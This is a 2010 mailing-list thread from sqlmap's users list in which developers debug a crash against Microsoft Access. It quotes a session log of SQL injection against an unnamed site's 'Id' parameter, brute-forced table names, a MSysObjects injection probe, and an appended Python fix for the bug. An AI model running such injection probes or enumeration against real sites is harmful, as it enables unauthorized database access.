>>>>> [15:30:49] [INFO] resuming injection point 'GET' from session file
>>>>> [15:30:49] [INFO] resuming injection parameter 'Id' from session file
>>>>> [15:30:49] [INFO] resuming injection type 'numeric' from session file
>>>>> [15:30:49] [INFO] resuming match ratio '0.9' from session file
>>>>> [15:30:49] [INFO] resuming 0 number of parenthesis from session file
>>>>> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session file
>>>>> [15:30:49] [INFO] testing connection to the target url
>>>>> [15:30:50] [INFO] testing for parenthesis on injectable parameter
>>>>> [15:30:50] [INFO] the back-end DBMS is Microsoft Access
>>>>> web server operating system: Windows 2008
>>>>> web application technology: ASP.NET, Microsoft IIS 7.5, ASP
>>>>> back-end DBMS: Microsoft Access
>>>>> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access
>>>>> do you want to use common table existance check? [Y/n/q]Y
>>>>> [15:30:52] [INFO] checking tables existence using items from '/root/sqlmap-dev/txt/common-tables.txt'
>>>>> [15:32:06] [INFO] retrieved: notas
>>>>> [15:57:55] [INFO] tried: 1780/1780 items (100%)
>>>>>
>>>>> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
>>>>> sqlmap version: 0.9-dev (r2265)
>>>>> Python version: 2.5.2
>>>>> Operating system: posix
>>>>> Traceback (most recent call last):
>>>>>   File "./sqlmap.py", line 79, in main
>>>>>     start()
>>>>>   File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start
>>>>>     action()
>>>>>   File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action
>>>>>     conf.dbmsHandler.dumpAll()
>>>>>   File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in dumpAll
>>>>>     for db, tables in kb.data.cachedTables.items():
>>>>> AttributeError: 'list' object has no attribute 'items'
>>>>
>>>> --
>>>> Miroslav Stampar
>>>>
>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>> Mobile: +385921010204 (HR 0921010204)
>>>> PGP Key ID: 0xB5397B1B
>>>> Location: Zagreb, Croatia
>>>
>>> --
>>> --------8<--------
>>> Carlos Gabriel Vergara
>>> http://www.ThorSecurity.com.ar
>>>
>>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
>>> -------->8--------
>>
>> --
>> Miroslav Stampar
>>
>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>> Mobile: +385921010204 (HR 0921010204)
>> PGP Key ID: 0xB5397B1B
>> Location: Zagreb, Croatia
>
> --
> --------8<--------
> Carlos Gabriel Vergara
> http://www.ThorSecurity.com.ar
>
> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
> -------->8--------

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
From: Carlos G. V. <car...@gm...> - 2010-11-09 14:06:16
"The law of the default"

If you must explicitly set the permissions, then it will be difficult to
find this kind of info. But if we are lucky and find a
"lazy-non-standard" programming, this could be a nice security breach.

I will read a little further... if something is found, I will share it.

Best regards,

2010/11/5 Miroslav Stampar <mir...@gm...>:
> well,
>
> SELECT Name FROM MSysObjects WHERE Type = 1
>
> (we already have it in ./xml/queries.xml)
>
> should basically get you this kind of information, but as I've
> understood, querying it from outside the MS Access environment (web
> browser, ODBC connection) should result in:
>
> .....id=1 AND EXISTS(SELECT * FROM MSysObjects)
>
> Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no read permission on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line 33
> SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no read permission on 'MSysObjects'.
>
> i haven't tested this against ASP environment, though.

--
--------8<--------
Carlos Gabriel Vergara
http://www.ThorSecurity.com.ar

PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
-------->8--------
From: Miroslav S. <mir...@gm...> - 2010-11-06 00:54:43
according to
http://forums.aspfree.com/microsoft-sql-server-14/what-prevents-me-from-reading-the-msysobjects-tbl-17321.html
the user needs to explicitly add permissions for querying system tables
(to all). as I am not fully aware of how many people do this, I am left
pretty undecided :)

On Sat, Nov 6, 2010 at 1:47 AM, Miroslav Stampar <mir...@gm...> wrote:
> well,
>
> SELECT Name FROM MSysObjects WHERE Type = 1
>
> (we already have it in ./xml/queries.xml)
>
> should basically get you this kind of information, but as I've
> understood, querying it from outside the MS Access environment (web
> browser, ODBC connection) should result in:
>
> .....id=1 AND EXISTS(SELECT * FROM MSysObjects)
>
> Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no read permission on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line 33
> SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no read permission on 'MSysObjects'.
>
> i haven't tested this against ASP environment, though.

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-11-06 00:47:49
well,

SELECT Name FROM MSysObjects WHERE Type = 1

(we already have it in ./xml/queries.xml)

should basically get you this kind of information, but as I've
understood, querying it from outside the MS Access environment (web
browser, ODBC connection) should result in:

.....id=1 AND EXISTS(SELECT * FROM MSysObjects)

Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no read permission on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line 33
SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no read permission on 'MSysObjects'.

i haven't tested this against ASP environment, though.

On Fri, Nov 5, 2010 at 7:17 PM, Carlos Gabriel Vergara <car...@gm...> wrote:
> I was working with access some time ago, and now that you mention it, I
> was working on getting metadata for the db. As far as I know, there
> are some "system tables", equivalent to sysobjects (mssql) or
> information_schema (mysql). Take a look at this article:
>
> http://www.datanumen.com/aar/articles/system-object.htm
>
> If I can find my test scripts, I will attach some to the list.
>
> Best regards,

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Carlos G. V. <car...@gm...> - 2010-11-05 18:17:33
I was working with access some time ago, and now that you mention it, I
was working on getting metadata for the db. As far as I know, there
are some "system tables", equivalent to sysobjects (mssql) or
information_schema (mysql). Take a look at this article:

http://www.datanumen.com/aar/articles/system-object.htm

If I can find my test scripts, I will attach some to the list.

Best regards,

2010/11/4 Miroslav Stampar <mir...@gm...>:
> hi Ulises.
>
> i am glad to see that someone has started using sqlmap against Access
> databases :)
>
> we've done the necessary patches to prevent a sqlmap crash in this kind
> of situation, but still, we haven't implemented dumping of tables for
> MS Access (due to the non-existent way of column enumeration - if someone
> has some non-brute-force idea, please say so and we'll try to
> implement it). also, support for this DBMS is still in an (early)
> development phase and we hope that we'll finish it in some reasonable
> time.
>
> kr
>
> On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote:
>>
>> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session file
>> [15:30:49] [INFO] resuming injection point 'GET' from session file
>> [15:30:49] [INFO] resuming injection parameter 'Id' from session file
>> [15:30:49] [INFO] resuming injection type 'numeric' from session file
>> [15:30:49] [INFO] resuming match ratio '0.9' from session file
>> [15:30:49] [INFO] resuming 0 number of parenthesis from session file
>> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session file
>> [15:30:49] [INFO] testing connection to the target url
>> [15:30:50] [INFO] testing for parenthesis on injectable parameter
>> [15:30:50] [INFO] the back-end DBMS is Microsoft Access
>> web server operating system: Windows 2008
>> web application technology: ASP.NET, Microsoft IIS 7.5, ASP
>> back-end DBMS: Microsoft Access
>> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access
>> do you want to use common table existance check? [Y/n/q]Y
>> [15:30:52] [INFO] checking tables existence using items from '/root/sqlmap-dev/txt/common-tables.txt'
>> [15:32:06] [INFO] retrieved: notas
>> [15:57:55] [INFO] tried: 1780/1780 items (100%)
>>
>> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
>> with the latest development version from the Subversion repository. If the
>> exception persists, please send by e-mail to
>> sql...@li... the command line, the following text and
>> any information needed to reproduce the bug. The developers will try to
>> reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 0.9-dev (r2265)
>> Python version: 2.5.2
>> Operating system: posix
>> Traceback (most recent call last):
>>   File "./sqlmap.py", line 79, in main
>>     start()
>>   File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start
>>     action()
>>   File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action
>>     conf.dbmsHandler.dumpAll()
>>   File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in dumpAll
>>     for db, tables in kb.data.cachedTables.items():
>> AttributeError: 'list' object has no attribute 'items'
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
--------8<--------
Carlos Gabriel Vergara
http://www.ThorSecurity.com.ar

PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
-------->8--------
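The AttributeError in the quoted traceback comes from dumpAll() iterating the cached table structure with .items() when the common-table check had stored a flat list of names rather than a {db: [tables]} dict. The following stand-in is an added example, not sqlmap's own code: it reproduces that failure and shows a normalisation step that accepts both shapes; the function names, the placeholder database label and the sample inputs are assumptions.

```python
# Added example, not sqlmap's code. All names below are hypothetical
# stand-ins for the dumpAll() / kb.data.cachedTables pattern in the report.
from typing import Dict, Iterable, List, Optional, Union

# Placeholder label for DBMSs such as MS Access that expose no database
# name to group tables under (constructed, not a sqlmap identifier).
DEFAULT_DB = "<no-database-name>"

CachedTables = Optional[Union[Dict[str, List[str]], List[str]]]


def dump_all_buggy(cached_tables: CachedTables) -> Dict[str, List[str]]:
    """Mirrors the failing loop: assumes a {db: [tables]} dict.

    When the common-table brute force stores a flat list of names,
    `.items()` does not exist and an AttributeError is raised, exactly
    as in the quoted traceback.
    """
    dumped = {}
    for db, tables in cached_tables.items():  # raises on a list
        dumped[db] = list(tables)
    return dumped


def reproduces_traceback(cached_tables: CachedTables) -> bool:
    """True when the buggy loop raises the AttributeError from the report."""
    try:
        dump_all_buggy(cached_tables)
    except AttributeError:
        return True
    return False


def _dedupe(names: Iterable[str]) -> List[str]:
    """Keep the first occurrence of each table name, preserving order."""
    seen = set()
    out = []
    for name in names:
        if name not in seen:
            seen.add(name)
            out.append(name)
    return out


def normalize_cached_tables(cached_tables: CachedTables,
                            default_db: str = DEFAULT_DB) -> Dict[str, List[str]]:
    """Return a {db: [tables]} dict whatever shape the cache has.

    - dict: each value coerced to a de-duplicated list
    - list/tuple/set of names (brute-force result): grouped under default_db
    - None or empty: empty dict, i.e. nothing to dump
    """
    if not cached_tables:
        return {}
    if isinstance(cached_tables, dict):
        return {db: _dedupe(tables) for db, tables in cached_tables.items()}
    if isinstance(cached_tables, (list, tuple, set)):
        return {default_db: _dedupe(cached_tables)}
    raise TypeError("unexpected cached table structure: %s"
                    % type(cached_tables).__name__)


def dump_all_fixed(cached_tables: CachedTables) -> Dict[str, List[str]]:
    """Same loop as dump_all_buggy, but over the normalised structure."""
    dumped = {}
    for db, tables in normalize_cached_tables(cached_tables).items():
        dumped[db] = list(tables)
    return dumped


if __name__ == "__main__":
    # Constructed sample: what the common-table check left behind in the
    # quoted run ("notas" was the single hit out of 1780 candidates).
    brute_forced = ["notas"]
    print("buggy loop raises:", reproduces_traceback(brute_forced))
    print(dump_all_fixed(brute_forced))
    print(dump_all_fixed({"app": ["users", "users", "orders"]}))
```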